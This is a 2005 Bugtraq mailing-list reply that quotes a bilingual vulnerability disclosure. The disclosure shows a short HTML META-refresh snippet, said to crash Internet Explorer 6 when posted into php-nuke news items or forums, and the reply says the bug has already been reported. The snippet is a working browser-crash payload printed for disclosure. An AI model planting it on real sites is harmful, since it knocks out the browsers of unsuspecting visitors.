
Date: Mon, 14 Mar 2005 23:19:40 +0100
From: "Berend-Jan Wever" <skylined@...p.tudelft.nl>
To: "WoRmZ Web" <wormz.web@...il.com>, <bugtraq@...urityfocus.com>
Subject: Re: html code include in phpnuke news crash IE 6


Same old, same old...
http://www.securityfocus.com/archive/1/390536
http://www.securityfocus.com/archive/1/385147
http://www.securityfocus.com/archive/1/362524

----- Original Message ----- 
From: "WoRmZ Web" <wormz.web@...il.com>
To: <bugtraq@...urityfocus.com>
Sent: Sunday, March 13, 2005 23:47
Subject: html code include in phpnuke news crash IE 6


> 
> 
> www.wormzweb.tk
> 
> ------------------------------------------------------------------------
> ------------------------------------------------------------------------
> ENGLISH
> ------------------------------------------------------------------------
> ------------------------------------------------------------------------
> 
> An html code include in the news in php-nuke (6.5 patched tested) make visitors with Internet Explorer 6 to crash. 
> 
> The code is the following:
> ******************************************************
> <html> 
> 
> <head> 
> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=file:// :\"> 
> </head> 
> 
> <body> 
> </body> 
> 
> </html>
> 
> ******************************************************
> 
> Submit news with this code without the admin verification, or submited by the admin will produce a error in Internet Explorer 6.x
> 
> This code can be included in forums or other places which allow html code with the same result.
> 
> You can read more about this in spanish:
> http://usuarios.lycos.es/wormzweb/modules.php?name=Forums&file=viewtopic&t=15&sid=f30c8bf88b4028790c2b35239862c2c1
> 
> And you can test it (IE will crahs about 5 seconds after the web will be completed charged)in this link:
> http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=164
> 
> ------------------------------------------------------------------------
> ------------------------------------------------------------------------
> SPANISH
> ------------------------------------------------------------------------
> ------------------------------------------------------------------------
> 
> 
> Un código html incluido en las noticias de php-nuke (probado en la 6.5 parcheada) hace a los viitantes con Internet Explorer un error. (Se produce el cierre del navegador)
> 
> 
> El código es el siguiente:
> ******************************************************
> <html> 
> 
> <head> 
> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=file:// :\"> 
> </head> 
> 
> <body> 
> </body> 
> 
> </html>
> 
> ******************************************************
> 
> 
> Un usuario podría enviar una noticia incluyendo este codigo y sin la vereficación del administrador, o el propio envio por el administrador provocará que los visitantes de la web que usen Internet Explorer 6.x se les cierre la página y produzca error en el navegador
> 
> Este código puede ser incluido en foros y otros lugares que permitan código html con el mismo resultado.
> 
> Puedes leer mas sobre este bug en el siguente link:
> http://usuarios.lycos.es/wormzweb/modules.php?name=Forums&file=viewtopic&t=15&sid=f30c8bf88b4028790c2b35239862c2c1
> 
> Puedes ver el codigo en uso y testear como funciona en el siguente link (Usando IE 6.x se cerrará el navegador pasados unos 5 segundos después de que la página se haya cargado completamente):
> 
> http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=164
> 
> ________________________________________________________________________
> 
> Para mas info [::wormz::] www.wormzweb.tk


